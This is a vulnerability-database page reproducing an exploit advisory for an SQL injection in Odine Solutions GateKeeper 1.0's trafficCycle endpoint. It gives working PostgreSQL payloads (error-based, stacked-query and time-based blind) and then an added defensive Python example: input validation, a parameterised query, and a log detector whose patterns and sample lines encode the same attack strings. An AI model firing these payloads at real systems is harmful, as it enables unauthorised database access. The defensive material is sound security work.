Wednesday, October 6, 2021

Odine Solutions GateKeeper 1.0 SQL Injection

# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
# Date: 05.10.2021
# Exploit Author: Emel Basayar
# Vendor: Odine Solutions
# Vendor Homepage:
# Version: 1.0
# Category: Webapps
# Tested on: Ubuntu 18 LTS
# Description : The vulnerability allows an attacker to inject SQL commands through the 'trafficCycle' parameter of the search section.
# This vulnerability was discovered during a penetration test and has since been fixed by the vendor.

# PoC: SQLi:

GET /rass/api/v1/trafficCycle/98 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx
Connection: close

Parameter: #1* (URI)
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload:' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB

Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload:';SELECT PG_SLEEP(5)--

Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload:' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC
web application technology: Nginx
back-end DBMS: PostgreSQL
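The sqlmap output above shows a numeric path segment (/trafficCycle/98) that is concatenated into a PostgreSQL query. The following is an added example, not the vendor's code or the advisory author's PoC: it shows the strict integer validation plus a bound-parameter query that closes this class of bug, and a small access-log triage that flags the three payload styles listed in the advisory (error-based CHR()/CAST(), stacked ';SELECT', and time-based PG_SLEEP) together with the 5-second latency a PG_SLEEP(5) probe leaves behind. The log format, the table and column names and the sample lines are constructed for this example and are not taken from the product.

```python
"""Defensive companion to the GateKeeper 'trafficCycle' SQL injection advisory.

Added example (not the vendor's code, not the advisory PoC).  Assumed log
layout for the triage part, one request per line:
    "$remote_addr" "$request" $status $request_time
"""
import re
from urllib.parse import unquote

# 1. Validation: the id in /rass/api/v1/trafficCycle/<id> is an integer, so
#    anything that is not a plain decimal number is rejected before any SQL
#    is built.  The query must still bind the value as a parameter;
#    validation is defence in depth, not a substitute.
RESOURCE_ID_RE = re.compile(r"^[0-9]{1,18}$")


def parse_resource_id(raw: str):
    """Return the id as int, or None if the segment is not a plain integer."""
    if not RESOURCE_ID_RE.match(raw):
        return None
    return int(raw)


def build_safe_query(raw_id: str):
    """Parameterised form of the lookup: the value never enters the SQL text.

    Returns (sql, params) for cursor.execute(sql, params) with a PostgreSQL
    driver that uses %s placeholders (e.g. psycopg2), or None when the id
    fails validation.  Table and column names are assumptions.
    """
    rid = parse_resource_id(raw_id)
    if rid is None:
        return None
    return ("SELECT * FROM traffic_cycle WHERE id = %s", (rid,))


# 2. Detection over access-log lines.  Indicators follow the advisory's
#    payloads: a quote followed by AND/OR, PG_SLEEP for time-based probes,
#    CHR()/CAST() for error-based extraction, ';SELECT' for stacked queries.
#    A request to the affected path that took 5 s or more is also flagged,
#    because PG_SLEEP(5) shows up as server-side latency.
LOG_RE = re.compile(
    r'^"(?P<ip>[^"]+)" "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<rt>[0-9.]+)$'
)
SQLI_TOKENS = {
    "PG_SLEEP": re.compile(r"pg_sleep\s*\(", re.I),
    "CHR_CAST": re.compile(r"(chr|cast)\s*\(", re.I),
    "STACKED": re.compile(r";\s*select", re.I),
    "QUOTE_BREAK": re.compile(r"'\s*(and|or)\b", re.I),
}
VULN_PATH_RE = re.compile(r"^/rass/api/v1/trafficCycle/(?P<id>[^/?]+)")


def triage_log_line(line: str):
    """Return the list of indicator names for one log line ([] if clean)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return ["UNPARSED"]
    path = unquote(m.group("path"))  # decode %27, %28 ... before matching
    hits = []
    vp = VULN_PATH_RE.match(path)
    if vp and parse_resource_id(vp.group("id")) is None:
        hits.append("NON_NUMERIC_ID")
    for name, rx in SQLI_TOKENS.items():
        if rx.search(path):
            hits.append(name)
    if vp and float(m.group("rt")) >= 5.0:
        hits.append("SLOW_RESPONSE")
    return hits


def triage_log(lines):
    """Map each suspicious line to its indicators; clean lines are omitted."""
    return {ln: h for ln in lines if (h := triage_log_line(ln))}


# Constructed sample: one benign request, then the advisory's three payload
# styles (the error-based one shortened) URL-encoded as a client sends them.
SAMPLE_LOG = [
    '"203.0.113.5" "GET /rass/api/v1/trafficCycle/98 HTTP/1.1" 200 0.021',
    '"203.0.113.5" "GET /rass/api/v1/trafficCycle/98%27%20AND%205042%3DCAST%28%28CHR%28113%29%7C%7CCHR%28118%29%29%20AS%20NUMERIC%29--%20yrdB HTTP/1.1" 500 0.034',
    '"203.0.113.5" "GET /rass/api/v1/trafficCycle/98%27%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 5.012',
    '"203.0.113.5" "GET /rass/api/v1/trafficCycle/98%27%20AND%209405%3D%28SELECT%209405%20FROM%20PG_SLEEP%285%29%29--%20PasC HTTP/1.1" 200 5.008',
]

if __name__ == "__main__":
    for ln, hits in triage_log(SAMPLE_LOG).items():
        print(hits, ln[:80])
```

The latency indicator is the one worth keeping even after the code fix: a blind probe that never trips a keyword pattern still costs the server the full PG_SLEEP interval, so a spike of multi-second responses on an endpoint that normally answers in milliseconds is a cheap, format-independent signal.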


Copyright © 2021 Vulnerability Database | Cyber Details™
